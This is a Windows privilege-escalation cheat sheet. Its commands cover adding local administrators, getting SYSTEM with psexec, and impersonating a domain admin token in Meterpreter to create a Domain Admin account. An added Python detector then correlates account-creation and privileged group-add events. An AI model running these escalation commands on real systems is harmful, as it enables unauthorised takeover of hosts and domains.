Check Who You Are
echo %USERDOMAIN%\%USERNAME%
whoami
Check Windows Version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Add a User
net user <username> <password> /add
Add a User to the Administrators Group
net localgroup administrators <username> /add
Getting from Administrator to System
psexec -s cmd.exe
Getting system with Meterpreter
(from the meterpreter shell)
Changing a User's Password
net user <username> <password>
View Domain Groups
net group /domain
View Members of Domain Group
net group /domain <Group Name>
Add Member with Domain Admin
This attack assumes you have obtained a Meterpreter shell on a system and you're lucky enough to have found a domain admin's token.
impersonate_token <Domain>\\<Username> # The Domain Admin's username
add_user <Username> <password> -h <Host IP of Domain Controller> # An attacker-defined username
add_group_user "Domain Admins" <Username> -h <Host IP of Domain Controller>
You should now have an account on the Domain Controller with Domain Admin privileges.
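From the defender's side, the account-creation sequences above (net user /add followed by net localgroup administrators /add, or add_user followed by add_group_user) show up in the Security log, when account-management auditing is enabled, as a creation event followed by a privileged group-membership event. The following is an added example, not part of the original page, that correlates the two; the flattened record shape, the 10-minute window and the sample events are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Windows Security event IDs: 4720 = user account created;
# 4728 / 4732 = member added to a security-enabled global / local group.
CREATED, GROUP_ADDS = 4720, {4728, 4732}
PRIVILEGED = {"domain admins", "administrators"}  # groups named on this page
WINDOW = timedelta(minutes=10)  # assumed correlation window

def find_new_account_escalations(events):
    """Alert when an account is created and then added to a privileged
    group within WINDOW. Records are assumed flattened to dicts."""
    created, alerts = {}, []  # created: account SID -> its 4720 event
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] == CREATED:
            created[ev["TargetSid"]] = ev
        elif ev["EventID"] in GROUP_ADDS:
            # In 4728/4732, TargetUserName is the group, MemberSid the member.
            origin = created.get(ev["MemberSid"])
            if origin is None or ev["TargetUserName"].lower() not in PRIVILEGED:
                continue
            gap = ev["TimeCreated"] - origin["TimeCreated"]
            if gap <= WINDOW:
                alerts.append({
                    "account": origin["TargetUserName"],
                    "group": ev["TargetUserName"],
                    "created_by": origin["SubjectUserName"],
                    "added_by": ev["SubjectUserName"],
                    "seconds_apart": int(gap.total_seconds()),
                })
    return alerts

def _ev(event_id, ts, subject, target, **extra):
    """Build one constructed, flattened event record."""
    return {"EventID": event_id, "TimeCreated": datetime.fromisoformat(ts),
            "SubjectUserName": subject, "TargetUserName": target, **extra}

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    _ev(4720, "2024-01-01T10:00:00", "da_alice", "svc_backup2", TargetSid="S-1-5-21-1-2-3-1601"),
    _ev(4728, "2024-01-01T10:00:40", "da_alice", "Domain Admins", MemberSid="S-1-5-21-1-2-3-1601"),
    _ev(4720, "2024-01-01T11:00:00", "helpdesk1", "jsmith", TargetSid="S-1-5-21-1-2-3-1602"),
    _ev(4728, "2024-01-01T11:01:00", "helpdesk1", "VPN Users", MemberSid="S-1-5-21-1-2-3-1602"),
    _ev(4732, "2024-01-01T15:00:00", "it_bob", "Administrators", MemberSid="S-1-5-21-1-2-3-1105"),
]

if __name__ == "__main__":
    for alert in find_new_account_escalations(SAMPLE_EVENTS):
        print(alert)
```

Only the first pair alerts: the second account joins a non-privileged group, and the last event adds an account with no recent creation record, which this rule leaves to a separate membership-change alert.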